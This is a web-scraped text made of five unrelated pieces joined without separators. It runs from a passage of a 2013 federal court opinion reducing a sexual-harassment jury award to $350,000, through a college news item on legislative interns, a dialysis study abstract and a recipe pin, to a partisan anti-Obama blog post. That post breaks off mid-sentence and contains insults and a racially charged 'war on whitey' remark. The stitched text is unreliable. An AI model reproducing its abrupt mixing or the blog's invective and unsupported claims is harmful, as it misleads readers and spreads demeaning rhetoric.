(remittitur). Gasperini, 518 U.S. at 433 (internal citations omitted). 15 106 F.3d at 1024 (internal citations omitted). Beyond this admonition, however, there is little guidance as to how district court judges should determine the “highest amount the jury tolerably could have awarded.” Some courts have utilized comparisons between similar cases to determine the appropriate range for a jury award, however, the D.C. Circuit, in an opinion by Judge Sentelle, has noted the “awkward[ness]” of this inquiry. In Peyton v. DiMario, for example, the appellant employer argued that the district court should have reduced a jury verdict of $482,000 to an amount below the Title VII statutory cap of $300,000, which the trial judge had already imposed. 287 F.3d at 1127. The Circuit first rejected the notion that Title VII requires verdicts to be determined on a sliding scale based on the egregiousness of the unlawful conduct, instead stating that “the proper approach is to determine whether the judgment awarded, regardless of whether it is the statutory maximum, is supported by evidence, and does not shock the conscience, or is not inordinately large so as to be obviously unreasonable.” Id. The Circuit went on to state: The cases that appellant offers for purposes of comparison in which lesser damages were awarded or approved do not convince us to the contrary. In rejecting that line of argument, we find useful the reasoning of a state court . . . . ‘[T]here is no way of obtaining uniformity in the amount juries and trial judges may award for damages . . . . Because of the unique circumstances of each case as well as the adjustments which would necessarily have to be made for inflation, it is awkward to discuss the size of an award through comparison with past decisions.’ Just so here. Id. (citations omitted). Comparisons between cases can indeed be difficult. Jury verdicts are not published in the same manner as opinions of the court. Although commercial databases include summaries of jury verdicts, these do not provide significant detail about the testimony provided or the basis for the verdict. To make an appropriate comparison between jury verdicts, one would need to know the damages alleged; whether the damages represent purely compensatory, non-economic 16 damages; what evidence was offered to support the alleged damages; etc. Moreover, even such information does not provide more subtle details such as jury assessments of witness credibility. Some courts, and the parties here, have thus argued that comparison with other cases is inappropriate. See, e.g., Ramseur v. Barreto, 213 F.R.D. 79, 84 (D.D.C. 2003) (“[T]his circuit has also rejected such comparisons as a basis upon which to determine whether remittitur should be ordered.”); Pl.’s Opp’n at 35 (“Plaintiff agrees with Defendant that . . . factual comparisons across cases are not useful (nor acceptable, per the D.C. Circuit) for determining when remittitur is appropriate.”). Nevertheless, the parties have provided comparison cases to illustrate an appropriate range of awards. See Pl.’s Opp’n at 35–36 (“[A] survey of recent jury awards is instructive as to what sort of award falls within a permissible range . . . .”); Def.’s Mot. at 29–30 (“Comparisons are useful . . . to place jury awards in employment cases into context . . . .”). Moreover, other district courts in our Circuit have suggested a willingness to consider comparison with similar cases. See Liberatore v. CVS New York, Inc., 160 F. Supp. 2d 114, 118–21 (D.D.C. 2001) (noting Judge Urbina’s reliance on case comparisons in Nyman v. FDIC, 967 F. Supp. 1562 (D.D.C. 1997), and stating that such reliance “remains valid” in analyzing a remittitur motion); see also Alkire v. Marriott Int’l, Inc., 2007 WL 1041660 (D.D.C. Apr. 5, 2007) (seeming to suggest, although ultimately declining to consider other cases, that the awards offered by the moving party for comparison would have been more instructive if they had included all damage awards, rather than just affirmative awards of remittitur). Finally, there has been little in the way of alternative guidance to suggest how district courts should determine the “highest amount the jury tolerably could have awarded.” In some circumstances, district courts appear to have simply, without explanation, chosen an amount for remittitur. See, e.g., Farar v. Wash. Metro. Area Transit Auth., CIV.A. 87-0142-OG, 1988 WL 17 43861 at *6 (D.D.C. Apr. 26, 1988) (holding, without explanation, that $80,698, or $30,000 below the original jury verdict, was the maximum amount the jury could have awarded). In short, although the Court is cognizant of the limitations of case comparisons, it does not equate the D.C. Circuit’s caution in this area with a prohibition. Courts must have some guidepost with which to determine whether a remittitur is appropriate and what amount serves as the “highest level the jury tolerably could have awarded.” Thus, the Court here will consider, at least in part, similar cases to determine the appropriate award for damages. 2. Legal Standard for Damages Award in This Case Title VII provides for compensatory, but not punitive, damages against state and local governments. 42 U.S.C. § 1981a(b)(1). Such damages are capped at $300,000 per complainant for large employers, id. § 1981a(b)(3), and may not include backpay or interest on backpay, id. § 1981a(b)(2). 6 The plaintiff bears the burden of proving she suffered noneconomic injuries such as emotional distress, pain and suffering, reputational harm, etc. Peyton, 287 F.3d at 1126. “Compensatory damages must be proven and cannot be presumed.” Id. (citing Carey v. Piphus, 435 U.S. 247, 263–64 (1978)). When a party requests compensatory damages in a jury trial, the jury is not to be informed of Title VII’s cap on damages. 42 U.S.C. § 1981a(c)(2); see also Martini v. Fed. Nat. Mortg. Ass’n, 178 F.3d 1336, 1349 (D.C. Cir. 1999). The D.C. Human Rights Act (DCHRA) and the D.C. Whistleblowers Protection Act (WPA) also allow for the recoupment of compensatory damages. See D.C. Code § 2-1403.16 (“Any person claiming to be aggrieved by an unlawful discriminatory practice shall have a cause of action . . . for damages and such other remedies as may be appropriate . . . . The court may grant any relief it deems appropriate . . . .”); D.C. Code § 1-615.54 (“An employee aggrieved by 6 In our Circuit, the $300,000 cap appears to apply per plaintiff and not per claim. See Peyton, 287 F.3d at 1124 (noting that the trial court “reduced the amount of compensatory damages recoverable to $300,000, the statutory maximum under Title VII” where plaintiff had prevailed on both hostile work environment and retaliation claims). 18 a violation of § 1-615.53 may bring a civil action against the District seeking relief and damages, including . . . (D) Restoration of lost benefits; (E) Back pay and interest on back pay; (F) Compensatory damages; and (G) Reasonable costs and attorney fees.”) Punitive damages are not at issue here and the jury was instructed only to calculate compensatory damages, if applicable. See Jury Instructions 8, ECF No. 180 (“[Y]ou should assess the amount you find to be justified . . . as full, just, and reasonable compensation for all of the plaintiff’s damages [with respect to the hostile work environment claim]. . . Compensatory damages are not allowed as punishment . . . .”); id. at 9 (“If you find for Ms. Jean-Baptiste on her claim that the defendant retaliated . . . you must determine whether she is entitled to damages in an amount that is fair compensation. . . . You may award compensatory damages for emotional pain and suffering, inconvenience, and mental anguish . . . .”); id. at 11 (“If you find for the plaintiff [on her Whistleblower claim], then you must award the plaintiff a sum of money which will fairly and reasonably compensate her for all the damage which she experienced . . . .”). 7 The jury was not asked to allocate damages among the plaintiff’s causes of action. However, this should not affect the Court’s determination of the appropriate award. Under the doctrine of double recovery, absent punitive damages, a “plaintiff can recover no more than the loss actually suffered.” Kassman v. Am. Univ., 546 F.2d 1029, 1033 (D.C. Cir. 1976) (emphasis added) (internal citations omitted). When a plaintiff seeks compensation for wrongs against him, he “should be made whole for his injuries, not enriched.” Medina v. Dist. of Columbia, 643 F.3d 7 Neither the WPA nor the DCHRA provide explicitly for punitive damages. “[A]s a general rule there can be no recovery of punitive damages against a municipality absent a statute expressly authorizing it,” Smith v. Dist. of Columbia, 336 A.2d 831, 832 (D.C. 1975), or absent “extraordinary circumstances.” Hunter v. Dist. of Columbia, 384 F. Supp. 2d 257, 262 n.4 (D.D.C. 2005) (citing Smith v. Dist. of Columbia, 336 A.2d 831, 832 (D.C. 1975)). “[E]xtraordinary circumstances” may exist, for example, “where a jurisdiction’s taxpayers are directly responsible for perpetrating the policies that caused the plaintiff's injuries [or] where a municipality or its policymakers have intentionally adopted the unconstitutional policy that caused the damages in question.” Daskalea v. Dist. of Columbia, 227 F.3d 433, 447 (D.C. Cir. 2000). No such extraordinary circumstances were alleged here and the jury thus considered only compensatory damages. 19 323, 326 (D.C. Cir. 2011). Thus, even where a party brings claims based on different theories, both state and federal, a party “‘cannot recover the same damages twice.’” Id. (quoting Bank One, Tex., N.A. v. Taylor, 970 F.2d 16, 34 (5th Cir. 1992)). Nevertheless, to the extent that a verdict based on both Title VII and state law causes of action exceeds the $300,000 Title VII cap, the trial court should allocate any damages above the cap to the state law claims. See Martini v. Fed. Nat. Mortg. Ass’n, 178 F.3d 1336, 1349 (D.C. Cir. 1999). 3. Remittitur is Appropriate as to Jean-Baptiste’s Damages Award A $3.5 million verdict for the damages alleged by Jean-Baptiste is so great as to “shock the conscience” and “so inordinately large as to obviously exceed the maximum limit of a reasonable range within which the jury may properly operate.” Jean-Baptiste provided the Court with a range of multimillion dollar verdicts from other circuits to bolster her award. These cases do not help Jean-Baptiste’s argument and may even hurt it. While she provides examples of cases in which plaintiffs were awarded between $1.6 and $39 million in compensatory or non-economic damages, these broader figures conceal the fact that in many of the cases, the actual awards for compensatory, non-economic damages (as in the case at bar) were much smaller or were later litigated in motions for remittitur. For example, although the Sixth Circuit affirmed a $6 million compensatory award in Morgan v. New York Life Insurance Co., only $500,000 of that award was for non-economic damages. 559 F.3d 425, 443 (6th Cir. 2009). The Sixth Circuit’s opinion does not detail the injuries suffered by the plaintiff or the evidence he presented and thus the Court cannot compare this $500,000 award with the case at hand. Similarly, only $500,000 of the $2 million award cited in Watson v. E.S. Sutton, Inc., was attributed to emotional damages and this was later reduced to $120,000 20 pursuant to a remittitur. See Watson v. E.S. Sutton, Inc., 2005 WL 2170659 (S.D.N.Y. Sept. 6, 2005) aff’d, 225 F. App’x 3, 4 (2d Cir. 2006). The District Court, in ordering remittitur, noted: [The plaintiff] has not pointed us to any comparable cases—that is, cases with no permanent psychological damage or disability resulting from the harassment— with awards so high as the one the jury here gave her. The decisions she has cited approving multi-hundred-thousand dollar awards for emotional damages all involve post-traumatic stress disorder, and plaintiffs who were forced to be medicated and out of work for extended periods of time. The Court is confident that $500,000 is well outside the acceptable range of damages [of $30,000 to $125,000] . . . for emotional distress in adverse employment action cases lacking extraordinary circumstances. Id. at 15–16. Likewise, in Aqeel v. Our Common Welfare, Inc., cited by Jean-Baptiste, the $1.6 million compensatory damage award was reduced to $125,000 after a motion for new trial or remittitur. No. 1:05-cv-02546 (N.D. Ga. Nov. 13, 2007); No. 1:05-cv-02546 (N.D. Ga. Dec. 7, 2007). 8 In that retaliation case, the court noted that the plaintiff’s injuries included humiliation when she couldn’t afford groceries after her termination, the emotional turmoil of filing for bankruptcy, damages to her reputation, and other aspects of her emotional pain and suffering. No. 1:05-cv- 02546 (N.D. Ga. Nov. 13, 2007). In our Circuit, a handful of verdicts have awarded over $1 million for discrimination or retaliation. However, the Court lacks sufficient information regarding these verdicts to 8 Ms. Jean-Baptiste also cites two cases which were later subject to motions for new trial or remittitur and which ultimately settled for undisclosed sums. Given the uncertainty about the level to which these verdicts might have been reduced pursuant to remittitur, the awards are not particularly instructive here. See Alford v. Aaron’s Rents, Inc., No. 3:08-cv-00683 (S.D. Ill. June 10, 2011) (jury award of $15 million in non-economic, compensatory damages, reduced by $3.7 million because of Title VII’s $300,000 cap, and later subject to a motion for new trial or remittitur and settled for an unspecified sum); Chopourian v. Catholic Healthcare West d.b.a. Mercy Hosp. and Mercy Gen. Hosp., No. 2:09-cv-02972 (E.D. Cal. Mar. 19, 2012) (jury award of $39 million in non-economic damages based on numerous causes of action, including several unrelated to sexual harassment or retaliation such as defamation, and later subject to a motion for new trial or remittitur and settlement). 21 determine whether they represent solely compensatory damages and, if so, whether they are limited to non-economic damages. 9 Moreover, Judge Urbina of this district, previously conducted an extensive survey of discrimination and retaliation verdicts and found the range of awards to be much lower—in the tens to hundreds of thousands of dollars. In Nyman v. FDIC, Judge Urbina acknowledged that discrimination and retaliation cases “are fact-specific and that comparisons between cases are difficult to make” and that “in arriving at a figure the court should rely primarily upon the evidence introduced at trial.” 967 F. Supp. 1562, 1571, 1580–84 (D.D.C. 1997). Nevertheless, the Court stated that “[c]omparisons . . . are useful in helping the court determine whether or not a given damage award falls within a permissible range.” Id. After surveying cases from this and other circuits, Judge Urbina concluded that, “in discrimination and retaliation cases the range of jury awards is generally between $10,000 and $150,000.” Even adjusting for inflation, this is far below the $3.5 million awarded here. This Court has also examined similar cases to determine whether more recent awards suggest a higher amount. Comparisons are difficult in the Title VII arena because any award over $300,000 is reduced to the statutory maximum of $300,000 and thus it is unclear whether judges in these cases would otherwise have subjected such damages to remittitur. See, e.g., Ramseur v. Baretto, 213 F.R.D. at 80 (noting that compensatory award of $420,000 was reduced 9 See, e.g., Bremer v. U.S. Dep’t of Commerce, 2005 WL 3369760 (D.D.C. Aug. 10, 2005) ($3 million in unspecified damages, which may have included economic damages, awarded in Title VII disability discrimination and retaliation case but ultimately reduced to $300,000 statutory cap); Fogg v. Ashcroft, U.S. Marshals Serv., 1998 WL 35271706 (D.D.C. April 1998) ($4 million in unspecified damages, ultimately reduced to $300,000, in Title VII race discrimination and retaliation case alleging hostile work environment, wrongful termination, and denial of promotions, overtime, and choice assignments); Mackel v. Wash. Metro. Area Transit Auth., 2001 WL 1782324 (D.C. Super. Oct. 2001) ($1.7 million in unspecified damages, ultimately reduced to $300,000 statutory cap, awarded to male manager who claimed retaliation in violation of Title VII after he testified at the discrimination trial of a female employee); Kumi v. Curtis Dworken Chevrolet, 1997 WL 33107008 (D.C. Super. Mar. 25, 1997) ($1.6 million in compensatory damages awarded in race discrimination case to two plaintiffs and appearing to include damages not only for humiliation, loss of enjoyment of life, and emotional distress, but also loss of income due to a failure of the defendant to promote plaintiffs to management positions). 22 to $300,000). However, some Title VII cases are instructive. For example, one Title VII case suggests that an award of $300,000 did not “shock the conscience” in a case where [Plaintiff] had worked her way up the ladder . . . , won a desirable apprenticeship, was harassed by a superior in the final months, was threatened, intimidated, physically assaulted, suffered retaliation for attempting to exercise her rights under Title VII, and was ultimately fired for exercising her rights . . .[and where the] evidence support[ed] the district court’s finding that she became depressed, angry, and suffered a loss of self-esteem. Peyton v. DiMario, 287 F.3d 1121, 1126 (D.C. Cir. 2002). In Peyton, the D.C. Circuit upheld the district court’s reduction of a $482,000 compensatory damage award to the Title VII statutory maximum of $300,000, despite the defendant’s argument that this amount was grossly excessive in light of plaintiff’s injuries. In essence, the circuit court held that the district court acted within its discretion in finding that this amount did not shock the conscience. Peyton, 287 F.3d at 1128 (noting however, that the court “might have decided this issue differently were it before [the court] de novo”). Cases of discrimination, retaliation, and wrongful termination under state law may also be instructive. At the high end of the range is Campbell-Crane v. Stamenkovic, 44 A.3d 924 (D.C. 2008). There, the plaintiff sued his employer for sexual harassment and retaliation under the DCHRA and the jury returned a verdict of $800,000 in emotional distress damages. However, the sexual harassment took place for over three years and included overt sexual advances and demands. The victim was afraid that if he displeased the defendant, she would not sponsor his work visa and he would be deported. He reported anxiety, depression, sleeping disorders, stomach pains, and weight fluctuations, among other symptoms, and his physician testified that he had major depression and post-traumatic stress disorder and that he would require ongoing medication and cognitive therapy. Id. at 945–46. The case thus differs from the case at hand in that it involved long-term sexual harassment, veiled threats not just of workplace 23 retaliation but of possible deportation, and corroborating testimony of a physician as to the emotional distress the plaintiff suffered. The award is significantly higher than what is warranted here. In Liberatore v. CVS, a jury awarded $1.1 million in emotional distress damages in a wrongful termination suit which Judge Roberts ordered remitted to $200,000. 160 F. Supp. 2d 114 (D.D.C. 2001). The plaintiff pharmacist had threatened to inform the FDA that his employer stored drugs at inappropriate temperatures. After the threat, the pharmacist became frightened and uncomfortable and, after his termination, he worried about money, lost his home as well as the new home he was going to buy, was forced to relocate to another state without his family, and felt humiliated and nervous. He reported no physical or psychological problems and did not offer expert reports or testimony. Judge Roberts noted that although the plaintiff was not required to present witnesses to corroborate his own testimony about his emotional distress, his testimony alone did not provide the “substantial evidentiary basis needed to warrant” an award of $1.1 million. In Martini v. Federal National Mortgage Association, the jury awarded $615,000 in damages for pain and suffering against three defendants, which the district court later remitted to $200,000. 977 F. Supp. 464, 475–78 (D.D.C. 1997) vacated on other grounds by 178 F.3d 1336 (D.C. Cir. 1999). In that case, the plaintiff had alleged sexual harassment by a co-worker and retaliation under Title VII and the DCHRA. After the co-worker was promoted, he eliminated the plaintiff’s job. As a result, she reported having stomach pains, grinding her teeth, and enduring humiliation and distress when terminated, as well as fears about the future. She presented evidence from her treating physician and dentist. 24 The District suggests that $300,000, while “far greater than the amount of damages proven at trial, is the highest amount tolerable to prevent a miscarriage of justice.” Def.’s Mot. 23. However, the District appears to have selected this amount in part because it is the cap imposed under Title VII. Id. at 33 (“[R]emitting the jury verdict to a sum not to exceed the Title VII statutory amount of $300,000 . . . is fair and just. Indeed, Congress has included a statutory cap that it reasoned would be just and fair.”). However, as the District acknowledges, Jean- Baptiste brought her claims not only under Title VII, but under the District’s Human Rights and Whistleblower Protection Acts, neither of which impose a statutory cap. This Court will not impose a federal cap on plaintiff’s state-law claims. Nor will it look to federal law to determine what is “fair and just” with respect to state-law claims. If the District of Columbia wishes to cap the damages plaintiffs can recover against private or government defendants, it may, but this Court cannot impose a cap where the City Council has not seen fit to do so. After evaluating discrimination and retaliation cases as well as their degree of similarity, and considering Judge Urbina’s finding that $150,000 was, in 1997, at the high end of the range for discrimination and retaliation cases, the Court finds that $350,000 is the highest amount a jury tolerably could have awarded. The conduct alleged in this case was no doubt disgusting and extremely troubling, and the jury had good reason to be disturbed by the facts. In finding the District liable on Jean- Baptiste’s hostile work environment and retaliation claims, the jury apparently credited the testimony of Ms. Jean-Baptiste and other witnesses. Jean-Baptiste described a work atmosphere in which, from the beginning of her employment, her supervisor asked her out on dates, asked her to accompany him on an overnight trip, spoke to her in sexually crude language, and sexually 25 propositioned her. Jean-Baptiste also stated that he ogled her while she stood before him in her bathing suit and that he had an erection while looking her over. Finally, after she complained, she stated that he began to criticize her work and to force her to sit in the lifeguard chair for hours at a time. The District’s apparent failure to respond to Jean-Baptiste’s complaints and the absence of adequate procedures to address complaints of sexual harassment in general are just as troubling. Jean-Baptiste testified that she spoke with six supervisors at various levels within DPR and that at least two women complained on her behalf. Yet no one in DPR appropriately investigated or remedied the situation. Jean-Baptiste also testified that she was forced to present at least one of her complaints in a meeting with her harasser. Witness testimony also suggested that there were ambiguities or even inaccuracies in the sexual harassment policy the District provided to its employees. The former EEO Officer testified that DPR would only investigate complaints of sexual harassment if they were submitted in writing, despite the fact that the District’s policy suggested that employees could merely “report the conduct to [their] supervisor” and that “[o]nce [the] supervisor has been made aware of the conduct the department will initiate an investigation and take the appropriate steps to ensure the conduct ceases.” Pl.’s Ex. 74. The policy further stated that victims could “[c]ontact the human resources office” at the telephone numbers provided. Finally, the testimony painted a picture of a work environment in which male supervisors could harass female employees without repercussion because they had “a boys club from the top down.” Test. of Stacy Mills, Trial Tr. 48–49, Aug. 7, 2012 (“[The director of aquatics] was . . . their . . . friend and savior . . . and Ford and [Weaver] . . . could do whatever they wanted . . . .”). 26 Yet despite this disturbing picture, the fact remains that Jean-Baptiste may only be compensated for injuries actually incurred and caused by the actions of the District. Punitive damages were not available in this case. If the jury imposed an award to punish the District, rather than to compensate Jean-Baptiste, the Court should remit the award to an amount actually supported by the evidence presented. Jean-Baptiste’s testimony regarding her injuries simply was not sufficient to support a $3.5 million verdict. She testified that the sexual harassment and retaliation “affected [her] deeply” and that she felt “less off,” “very bad,” and “less of a mother” for having to depend on food stamps. Trial Tr. 125–28, Aug. 6, 2012. She also said that the episode brought her stress, anxiety, and depression, that she had trouble sleeping, felt “withdrawn” and “depressed,” gained twenty five pounds, and had “some hair loss.” Id. Although these injuries could be severe, her testimony on the topic amounted to only two to three of the approximately 200 pages of the transcript of her testimony. Further, despite stating that it would take her “years” to forget what happened, she did not detail the severity or duration of her psychological injuries. Moreover, apart from one comment by Takoma volunteer Stacy Mills, Jean-Baptiste presented no corroborating testimony as to her mental or physical state or the impact the harassment and retaliation had on her. Mills testified that Weaver and Robert Ford would keep Jean-Baptiste in the lifeguard chair for long periods of time and would follow her around to see where she was going. During these interactions, Mills said that Jean-Baptiste looked “stressed,” “frustrated,” and “kind of nervous . . . she could barely talk”. Trial Tr. 47, Aug. 7, 2012. Jean- Baptiste offered no testimony from a medical or psychological professional regarding the impact the harassment and retaliation had on her physical or mental health. She stated only that because her “energy level” was down, she began acupuncture at her temple on the advice of her pastor. 27 Trial Tr. 127, Aug. 6, 2012. She offered no testimony from the pastor or acupuncturist. Apart from the acupuncture, she does not appear to have sought medical or psychological treatment. While plaintiffs are not required to offer expert testimony to support a damages award, see Jefferson v. Milvets Sys., Tech., Inc., 986 F. Supp. 6, 8 (D.D.C. 1997), the weight of the evidence must support the damages given. For example, in Liberatore v. CVS, the court noted that while the plaintiff “was not required to present witnesses to corroborate his own testimony about his emotional distress . . . [his] testimony alone [did] not provide the substantial evidentiary basis needed to warrant an award” of $1.1 million. 160 F. Supp. 2d at 20; see also id. (citing Spence v. Bd. of Educ., 806 F.2d 1198, 1201 (3d Cir. 1986) (holding that “emotional distress damages may not be presumed,” and that plaintiff’s testimony in that employment retaliation case, by itself, was insufficient to support jury’s award for emotional distress damages)). Similarly, in Hetzel v. Cnty. of Prince William, the Fourth Circuit held that an award of $500,000 for emotional distress on a Title VII retaliation claim was “grossly excessive” and remanded to the district court with instructions to recalculate the award. 89 F.3d 169, 173 (4th Cir. 1996). In so doing, the court noted that the award was based “almost entirely on plaintiff’s own self-serving testimony” and that of her co-workers and that the plaintiff had never seen a doctor, therapist, or other professional. In short, this evidence falls far short of that warranting a $3.5 million award. III. CONCLUSION The District’s motion for a new trial will be denied. The Court’s exclusion of testimony by Arnita Bonner-Evans or Richelle Marshall, even if it was error, did not cause undue prejudice. Additionally, the District failed to preserve its objection to the adverse inference instruction and cannot now argue for a new trial on the basis of any alleged error in the giving of that instruction. 28 However, the District’s motion for remittitur will be granted. The jury’s verdict that the District violated Title VII, the DCHRA, and the WPA is supported by the evidence. Jean- Baptiste presented evidence that, if believed, suggested she was sexually harassed by Rodney Weaver, that she and others repeatedly reported his conduct to management without response, and that her employment was either terminated or not continued in response. However, Jean- Baptiste did not present evidence that she is owed compensatory damages in the realm of $3.5 million. The Court finds that the highest amount the jury tolerably could have awarded, based on the damages she established, is $350,000. Jean-Baptiste will have twenty one days from the date of this Opinion to inform the Court and the defendant, in writing, of her decision whether to accept this reduced award or to proceed to a new trial on damages. An Order consistent with this Memorandum Opinion issues this date. Signed by Royce C. Lamberth, Chief Judge, on March 18, 2013. 29
Three selected as Frasure-Singleton interns April 18, 2013 Three West Virginia Wesleyan College students were selected to the Frasure-Singleton Internship program, a one-week internship at the state Capital where students assist a specific senator or delegate during the regular 60-day session. Mason Barnhart, Jessicah Cross and Abby Saenz were this year's recipients. Participants selected are assigned to a legislator who assists in explaining the legislative process. They attend committee meetings and public hearings where legislation and issues are extensively discussed. The students sit on the floor during the daily sessions surrounded by legislators determining the fate of the legislation, and aid the senator or delegate with issue research, constituent requests and other legislative tasks. Barnhart, a sophomore political science major and philosophy minor from Wellsburg, shadowed Delegate Doug Skaff, D-Kanawha. Barnhart sat in on House sessions and helped draft and submit a bill for the naming of a memorial bridge in Kanawha County. "The Frasure-Singleton Internship was an amazing experience that opened my eyes to the importance of state government," Barnhart said. "None of this would have been possible without the care and guidance of Dr. Rob Rupp and the rest of the Wesleyan faculty and staff." Barnhart is a member of Theta Xi Fraternity, the Pre-Law Society, Sigma Alpha Pi and Alpha Lambda Delta. Cross, a sophomore political science major and library science minor from Philippi, attended committee meetings with Delegate Bill Hamilton, R-Upshur. Cross attended House sessions and sat on the floor with him. During her internship, Cross completed a study resolution on the negative effects of medical marijuana. She also attended the Governor's Ball. "This experience has allowed me to see what I have been studying in my class in action," Cross said. "I was very lucky to have been assigned to Delegate Hamilton. He wanted me to get the most out of my week as possible. I am beyond blessed to be attending Wesleyan, and I would not have had this amazing opportunity if it were not for my professors, who take a personal interest in my education." Cross is a member of Zeta Tau Alpha, the National Society of Leadership and Success and the Library Strategic Planning Task Force, and she is a co-founder of the Commuter Student Organization. Saenz, a junior public relations major and political science minor from Buckhannon, shadowed Delegate Stephen Skinner, D-Jefferson, a 1990 Wesleyan alumnus. She attended judiciary finance and health committee meetings, took part in daily floor sessions and attended the women's caucus meeting. "My experience at the Capital was unforgettable," Saenz said. "I met incredible people from all over the state and was placed with outstanding interns, one of whom was a refugee from Africa who is now a U.S. citizen. I was constantly reminded by each vote made that our government is truly for the people, of the people and by the people, as President Lincoln once said." Saenz serves as the public relations vice president for Alpha Xi Delta and the director of public relations for Greek Life.
Secondary hyperparathyroidism in chronic dialysis patients: results of the Italian FARO survey on treatment and mortality. Vitamin D receptor activator (VDRA) therapy has been shown to be associated with reduced mortality rates in chronic kidney disease (CKD) patients with secondary hyperparathyroidism (SHPT). However, differences between VDRAs in their ability to reduce both all-cause and cardiovascular-related mortality rates are not yet fully elucidated. The objective of the current analysis was to determine the effect of VDRA therapy on mortality in an Italian dialysis population, observed prospectively every 6 months for 18 months. Patients were investigated for all-cause and cardiovascular-related mortality risk adjusted for various demographic, clinical, and/or SHPT treatment variables. The cumulative probabilities of all-cause and cardiovascular-related mortality were lower for patients who received any VDRA treatment compared with those who did not (p < 0.001) regardless of all measured variables. Additionally, patients who received paricalcitol and/or cinacalcet (with or without VDRAs) compared with calcitriol showed a significant improvement in both all-cause and cardiovascular-related mortality (p < 0.001). Cinacalcet with or without VDRAs was not associated with a further decrease of mortality hazard ratios compared with paricalcitol monotherapy. VDRA therapy (associated or not with cinacalcet) was associated with improved survival in dialysis patients, independent of demographic and clinical variables.
Related Pins BLT&A Wrap: This wrap is a simple and speedy with only 5 ingredients. It is gluten free (with Udi's tortillas), uses heart healthy fats from avocado, and by subbing in low sodium turkey bacon you lose the guilt and keep the flavor. #glutenfree#healthyfats#simplemeal
It’s impossible to post incisive observations on everything President Barack Obama’s mainstream media report and don’t report on significant stories and events that reflect negatively on their anointed one. Some stories and events become so public that the MSM is forced to mention them and then, dutifully, bury them in the journalistic graveyard as if they had never happened. Therefore, in the interests of public service, I present a few Obama-related stories which have either been ignored by the MSM or which the mainstreamers quickly relegated to the scrapheap along with tales of Martians invading Earth and Democrats acting stupidly. The story of Dems so enamored of their hero that they superimposed a picture of Obama in place of the 50 stars on the American flag, reflecting their total ignorance of proper flag protocols, was briefly covered by the MSM, without commentary on those time-honored protocols. The next steps might be his face on a trillion dollar bill and Mount Rushmore. It gets much better or much worse, depending on your political perspective. . The MSM gave little play to the thoughts of Steven Chu, Obama’s Energy Secretary, on gas prices both before and after he was appointed. Chu, who admitted he doesn’t drive a car, had advocated for European-level gas prices of ten dollars a gallon in the U.S. and repeated that wish even after prices began to soar. The media also ignored his backtracking in the face of Republican derision and Chu now says, “I no longer share that view. . . Of course, we don’t want the price of gasoline to go up. We want it to go down.” But, of course! Outside of the administration, I don’t know who else shared Chu’s view of the benefits of astronomical gas prices. I suspect the nitwit DOE secretary got a call from one of Obama’s henchmen telling him to shut up and retreat from his imbecilic position. . On a “comedic” front in America’s culture war, black comedian Chris Rock reverted to form and exploded when asked a question by conservative author of Obama Zombies and Hollywood Hypocrites, Jason Mattera. Last year, Rock had incoherently said in Esquire, “When I see the Tea Party and all this stuff, it actually feels like racism’s almost over. Because this is the last–this is the act up before the sleep. They’re going crazy. They’re insane. You want to get rid of them,” and Mattera asked him to explain his baseless comments. Instead of clarifying, Rock erupted, ripped the camera out of the hands of Mattera’s camerawoman, hurled it 50 feet, and challenged Mattera to a fight–while Rock was in the protection of two bodyguards. . Arizona’s Maricopa County Sheriff, Joe Arpaio, clearly regards the president and his immigration policies the same way he thinks of rattlesnakes and illegal aliens. . . (Read more at http://www.genelalor.com/blog1/?p=17403.) Grandfather arrested for holding burglar at gun point while waiting for police to arrive ____________________ Police, like public school teachers, wish to preserve their monopolies. That is why many police are opposed to citizens being armed (and even more strongly oppose citizens using their arms). In the same way, public school teachers are horrified by the idea that parents would either educate their own kids, or have the freedom to use their tax dollars to have some choice in who and how their kids are educated. Sam Adams The MSM gave little play to the thoughts of Steven Chu, Obama’s Energy Secretary, on gas prices both before and after he was appointed. Chu, who admitted he doesn’t drive a car, had advocated for European-level gas prices of ten dollars a gallon in the U.S. and repeated that wish even after prices began to soar. The media also ignored his backtracking in the face of Republican derision and Chu now says, “I no longer share that view. . . Of course, we don’t want the price of gasoline to go up. We want it to go down.” But, of course! _________________ Chu and Obama haven’t retreated from their belief that we need to move away from fossil fuels. Obama, in support of that belief, stated that “under my plan, electricity rates will necessarily skyrocket.” Yet now that Obama owns the economy, he certainly doesn’t like the results of such a plan to reflect badly upon him or his re-election chances. David Cameron and Barack Obama have been discussing an unprecedented international deal to force down the price of fuel. In talks at the White House, the president is understood to have raised the idea of both the U.S. and Britain authorising a release of strategic oil reserves to increase supply. Tim Yeo MP, Conservative Chairman of Energy and Climate Change select committee, added that any planned release of reserves was ‘entirely about the U.S. election’. …..Mr Cameron later added: ‘We didn’t make any decisions about the release of global oil stocks. We have got to look at this issue carefully. Any move on this front ought to be to recognise supply disruptions and smooth that out. ‘There is a wider lesson we have got to learn, which is we have got to become less reliant on hydrocarbons. We have got to wean our economies off their addiction.’ But he added: ‘Short term, should we look to reserves? Yes we should.’ One source said details of the timing, volume and duration of a release of oil could be agreed by the summer. A move at that point would be convenient for Mr Obama, just months ahead of the U.S. elections in November. Other countries would be approached and asked to join the scheme. ______________ What???? Obama would provide timed releases from the strategic oil reserves, simply to increase his chances of re-election? Wow…I didn’t see that one coming. Obama and friends can lie about the unemployment rate, as well as the extent of “economic recovery,” etc. Tey can’t lie about gas and food prices. The cost of living in the U.S. rose in February by the most in 10 months, reflecting a jump in gasoline… The biggest jump in gasoline in more than a year accounted for about 80 percent of the increase in prices last month, leaving households with less money to spend on other goods and services. In 1980, some 11 percent of young adults lived in multigenerational households, suggesting that a strong economy helped youngsters gain independence more quickly. Today, some 29 percent of 25- to 34-year olds either never moved out of their parents’ home or say they returned home in recent years because of the economy, according to the Pew report. Among 18- to 24-year olds, that figure is even higher – 53 percent of young adults in that age group live at home. Bloodless Coup Obama, Bell, Farrakhan, Ayers, Holder NOI, the New Black Panthers and the war on whitey. The latest misperception out there -affecting the thinking of Republicans and Dumbasdirtcrats alike, is a meme that the president “can’t do anything about oil prices in foreign countries like Iran.” Bull. First of all, the most ignominious act of cowardice ever committed by U.S. leaders (and that’s saying a lot) was in pulling out of Iraq without a single oil contract to guarantee submarket prices on an uninterrupted flow of oil from Iraq into the U.S. Such an agreement would have not only helped the U.S., but would have been a Marshall plan for Iraq, creating tons of wealth for that country through its oil industry for years. Secondly, both BO and W had chances to intervene in Iran to push for regime change. Were this a top-line consideration, it is conceivable that U.S. involvement in the formation and establishment of a new ruling authority in Iran could at certain stopgaps, have led to oil export agreements. W couldn’t get involved in Iran due to his loss of credibility in the U.S. after conquering 